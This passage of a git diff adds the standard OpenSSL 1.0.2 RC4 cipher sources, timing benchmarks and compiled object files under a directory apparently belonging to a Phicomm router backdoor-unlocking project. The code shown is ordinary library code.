+            key->x = x;
+            key->y = y;
+            return;
+        }
+    }
+#endif
+#define LOOP(in,out) \
+                x=((x+1)&0xff); \
+                tx=d[x]; \
+                y=(tx+y)&0xff; \
+                d[x]=ty=d[y]; \
+                d[y]=tx; \
+                (out) = d[(tx+ty)&0xff]^ (in);
+
+#ifndef RC4_INDEX
+# define RC4_LOOP(a,b,i) LOOP(*((a)++),*((b)++))
+#else
+# define RC4_LOOP(a,b,i) LOOP(a[i],b[i])
+#endif
+
+    i = len >> 3;
+    if (i) {
+        for (;;) {
+            RC4_LOOP(indata, outdata, 0);
+            RC4_LOOP(indata, outdata, 1);
+            RC4_LOOP(indata, outdata, 2);
+            RC4_LOOP(indata, outdata, 3);
+            RC4_LOOP(indata, outdata, 4);
+            RC4_LOOP(indata, outdata, 5);
+            RC4_LOOP(indata, outdata, 6);
+            RC4_LOOP(indata, outdata, 7);
+#ifdef RC4_INDEX
+            indata += 8;
+            outdata += 8;
+#endif
+            if (--i == 0)
+                break;
+        }
+    }
+    i = len & 0x07;
+    if (i) {
+        for (;;) {
+            RC4_LOOP(indata, outdata, 0);
+            if (--i == 0)
+                break;
+            RC4_LOOP(indata, outdata, 1);
+            if (--i == 0)
+                break;
+            RC4_LOOP(indata, outdata, 2);
+            if (--i == 0)
+                break;
+            RC4_LOOP(indata, outdata, 3);
+            if (--i == 0)
+                break;
+            RC4_LOOP(indata, outdata, 4);
+            if (--i == 0)
+                break;
+            RC4_LOOP(indata, outdata, 5);
+            if (--i == 0)
+                break;
+            RC4_LOOP(indata, outdata, 6);
+            if (--i == 0)
+                break;
+        }
+    }
+    key->x = x;
+    key->y = y;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..2e4427f186bcaa12b687d46a37cf518f9d8aafca
GIT binary patch
literal 3952
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
HT*&_q@U+Wk

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_locl.h
new file mode 100644
index 0000000..faf8742
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_locl.h
@@ -0,0 +1,5 @@
+#ifndef HEADER_RC4_LOCL_H
+# define HEADER_RC4_LOCL_H
+# include <openssl/opensslconf.h>
+# include <cryptlib.h>
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_skey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_skey.c
new file mode 100644
index 0000000..06890d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_skey.c
@@ -0,0 +1,116 @@
+/* crypto/rc4/rc4_skey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc4.h>
+#include "rc4_locl.h"
+#include <openssl/opensslv.h>
+
+const char RC4_version[] = "RC4" OPENSSL_VERSION_PTEXT;
+
+const char *RC4_options(void)
+{
+#ifdef RC4_INDEX
+    if (sizeof(RC4_INT) == 1)
+        return ("rc4(idx,char)");
+    else
+        return ("rc4(idx,int)");
+#else
+    if (sizeof(RC4_INT) == 1)
+        return ("rc4(ptr,char)");
+    else
+        return ("rc4(ptr,int)");
+#endif
+}
+
+/*-
+ * RC4 as implemented from a posting from
+ * Newsgroups: sci.crypt
+ * From: sterndark@netcom.com (David Sterndark)
+ * Subject: RC4 Algorithm revealed.
+ * Message-ID: <sternCvKL4B.Hyy@netcom.com>
+ * Date: Wed, 14 Sep 1994 06:35:31 GMT
+ */
+
+void private_RC4_set_key(RC4_KEY *key, int len, const unsigned char *data)
+{
+    register RC4_INT tmp;
+    register int id1, id2;
+    register RC4_INT *d;
+    unsigned int i;
+
+    d = &(key->data[0]);
+    key->x = 0;
+    key->y = 0;
+    id1 = id2 = 0;
+
+#define SK_LOOP(d,n) { \
+                tmp=d[(n)]; \
+                id2 = (data[id1] + tmp + id2) & 0xff; \
+                if (++id1 == len) id1=0; \
+                d[(n)]=d[id2]; \
+                d[id2]=tmp; }
+
+    for (i = 0; i < 256; i++)
+        d[i] = i;
+    for (i = 0; i < 256; i += 4) {
+        SK_LOOP(d, i + 0);
+        SK_LOOP(d, i + 1);
+        SK_LOOP(d, i + 2);
+        SK_LOOP(d, i + 3);
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_skey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_skey.o
new file mode 100644
index 0000000000000000000000000000000000000000..61be61f9cba9f50627a14c7752390fa3a289c94b
GIT binary patch
literal 2136
zcmbtU%}*0S6o36tszE4(gMgYn8Hh0H)*4e2OtGzOOqB@XKs?l?E<&)|W_L=c2aO?q
zG=zks|ArUiv4jJ9@#DtPn<o#%lZK?ew>wjo?P83+WcI!Jz2BR8JM-IpnlIc8he9AN
z1lQqkCQ*Rb(Ze|7gc<0C9{ACF;g_~~f{-1GXA7HCF}11fb`jLby^LwCrZz!q*7ggH
zZSC1^43|=ydG$kXWAJwA%VcXi7uvfKj`sJyZBC~5YY|KpN}s1U2eu|Rh8lzU#!zl!
zKI*6D(jWcQ`KZf{{S7zfa=ZV))z-J;vW@uz<ZJ0qz0dQlR_or5RZ5Lixiz+I@=<!#
zV{9gyQmVSemCB+rT{X<v*@B|71WPK(q;g9)m1IJ_0x*@$UQ<Tq7HTH1DQR|@CC1gO
zHD{_mNhVk#HR{508@i4-4m$a%J97{QXc88|K{ntz2tA&G&{{k++}#!1!b_l<b0XI*
z{8{t~5q~G2?}@L6!{2&h0t|4Zktpo90#evRkb<Z;+1=5q2(A=l5$EkXGZ8r12_h1K
z;D#e`>KOj%4%|HxN6#I(2solXg7@L9-}AomOwS8k&Yg2bOvTaX>Hi|m9YZ}8?G>ZW
zO27))1fXz=l`3DZm^M_c<yD;<MZ#=@7m?=VR}ITX0@cgTPzOM7b$}uzQ!pkYoQAZN
z2qZ511ZLOETwg%XE!Qu}$TA-3j2mkl*aMyGz!q#9m{p+((N(6(DX>zdTsBOkniXy^
zl<2t4_0o!%KQwEsYE`O+#p_r@3mZ$tMN2Omvcv!L3YL=!{YuFoM)uQn?WbR{!<Zpe
zX4(ulcrPSO-wYX@8`VnXNu2JLaKGZy{*91B=7+}+qc#7vo^(cQCUJO8?tjJ$Vl4NU
zJ|i%%W~k)8AhdN$Ae!Pl4<8zaM3w&)nRy}VFG)an0k`|Oi@3zR)Hgw309Qwhz6pQ-
z??k<VIj_n4lUN-CqWbIiL_NKq*ZlPylR^6VDlSx>3+acxS6MIh6SOz&r-+7@L?3jI
mw1&T){&;@vAOx=jI6)JSiRIb|{nvu(<KkDn-e$Uizy3E7{@oV<

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_utl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_utl.c
new file mode 100644
index 0000000..7c6a15f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_utl.c
@@ -0,0 +1,62 @@
+/* crypto/rc4/rc4_utl.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/opensslv.h>
+#include <openssl/crypto.h>
+#include <openssl/rc4.h>
+
+void RC4_set_key(RC4_KEY *key, int len, const unsigned char *data)
+{
+#ifdef OPENSSL_FIPS
+    fips_cipher_abort(RC4);
+#endif
+    private_RC4_set_key(key, len, data);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_utl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_utl.o
new file mode 100644
index 0000000000000000000000000000000000000000..6a14f9717cfd5b3a0b0f1e1f7155ff8162b0622c
GIT binary patch
literal 1536
zcmbtT&ref95S~X-P%(n>U;;7Ei;*as7Hbp^rqHyFrV)d1G@IADilM*q-agWLfPcZG
ze-20f6gU!Ygal{a+kx$7@t|L_Z)U#EH?u#c2eoE>A_#yHz&p5(m<2eTxb`cVTY>v9
z17{DOoS$TIqgq`JpKrI)o=(FR@k$hzN^jCEEbT8BMX|h?(^>W;erIvr!qxb=4Osq=
zxB@Q1qufC7a}$E$Y%o7FHT?@WM*M>L?T)d3Gjx_oIKA}c6uc*;J@78ZRRyf%Lji94
zXsj}I13!HOPq#6SMGPNW`{Xm<L!R!>#Zx4FJjCs?Om#=JK{lEj>uXK9QLlflZON^*
z^=3`NApWrzX(czSWtk`~ch!h$^N#4`)brvpM~FUw#=;s60FjKkI%=WSac+0mi&ZBQ
zS`9UbuaS;Gw2}lwyWj1q9&)|DRsv^XDbZ1T*Tmm@sTjolfr|AAL{>rV$Zv7fRayW4
z{e)P6X2gBL3UUO#?>x$L*(W=Xi|(d^%SLD}<*^~}qNP6k^2|RoygPC4jm|Yx!^TSt
zsOG=wOQ@xqMO-$x{|lQ$pZl|2wKzLf+kxe?j;Rmm(7$AChA<wQgwR+ve19Cb(4m^H
z{<leR&*kdBV4m;&-g@4Tw5;d%^Yy0INAy92=D_sdp;>bE#JO*W6dW7fYYHqF`ihxD
Q&!_)n_TRb6%pF(%2fRUG8vp<R

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4s.cpp
new file mode 100644
index 0000000..3814fde
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4s.cpp
@@ -0,0 +1,73 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/rc4.h>
+
+void main(int argc,char *argv[])
+	{
+	unsigned char buffer[1024];
+	RC4_KEY ctx;
+	unsigned long s1,s2,e1,e2;
+	unsigned char k[16];
+	unsigned long data[2];
+	unsigned char iv[8];
+	int i,num=64,numm;
+	int j=0;
+
+	if (argc >= 2)
+		num=atoi(argv[1]);
+
+	if (num == 0) num=256;
+	if (num > 1024-16) num=1024-16;
+	numm=num+8;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<10; i++) /**/
+			{
+			RC4(&ctx,numm,buffer,buffer);
+			GetTSC(s1);
+			RC4(&ctx,numm,buffer,buffer);
+			GetTSC(e1);
+			GetTSC(s2);
+			RC4(&ctx,num,buffer,buffer);
+			GetTSC(e2);
+			RC4(&ctx,num,buffer,buffer);
+			}
+
+		printf("RC4 (%d bytes) %d %d (%d) - 8 bytes\n",num,
+			e1-s1,e2-s2,(e1-s1)-(e2-s2));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4speed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4speed.c
new file mode 100644
index 0000000..3f13a2b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4speed.c
@@ -0,0 +1,239 @@
+/* crypto/rc4/rc4speed.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* 11-Sep-92 Andrew Daviel   Support for Silicon Graphics IRIX added */
+/* 06-Apr-92 Luke Brennan    Support for VMS and add extra signal calls */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/rc4.h>
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  define HZ      100.0
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi) || defined(_AIX)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static unsigned char key[] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10,
+    };
+    RC4_KEY sch;
+    double a, b, c, d;
+#ifndef SIGALRM
+    long ca, cb, cc;
+#endif
+
+#ifndef TIMES
+    printf("To get the most accurate results, try to run this\n");
+    printf("program when this computer is idle.\n");
+#endif
+
+#ifndef SIGALRM
+    printf("First we calculate the approximate speed ...\n");
+    RC4_set_key(&sch, 16, key);
+    count = 10;
+    do {
+        long i;
+        unsigned long data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            RC4(&sch, 8, buf, buf);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count / 512;
+    cc = count * 8 / BUFSIZE + 1;
+    printf("Doing RC4_set_key %ld times\n", ca);
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    printf("Doing RC4_set_key for 10 seconds\n");
+    alarm(10);
+#endif
+
+    Time_F(START);
+    for (count = 0, run = 1; COND(ca); count += 4) {
+        RC4_set_key(&sch, 16, key);
+        RC4_set_key(&sch, 16, key);
+        RC4_set_key(&sch, 16, key);
+        RC4_set_key(&sch, 16, key);
+    }
+    d = Time_F(STOP);
+    printf("%ld RC4_set_key's in %.2f seconds\n", count, d);
+    a = ((double)COUNT(ca)) / d;
+
+#ifdef SIGALRM
+    printf("Doing RC4 on %ld byte blocks for 10 seconds\n", BUFSIZE);
+    alarm(10);
+#else
+    printf("Doing RC4 %ld times on %ld byte blocks\n", cc, BUFSIZE);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cc); count++)
+        RC4(&sch, BUFSIZE, buf, buf);
+    d = Time_F(STOP);
+    printf("%ld RC4's of %ld byte blocks in %.2f second\n",
+           count, BUFSIZE, d);
+    c = ((double)COUNT(cc) * BUFSIZE) / d;
+
+    printf("RC4 set_key per sec = %12.2f (%9.3fuS)\n", a, 1.0e6 / a);
+    printf("RC4   bytes per sec = %12.2f (%9.3fuS)\n", c, 8.0e6 / c);
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4test.c
new file mode 100644
index 0000000..e2bfbfa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4test.c
@@ -0,0 +1,235 @@
+/* crypto/rc4/rc4test.c */
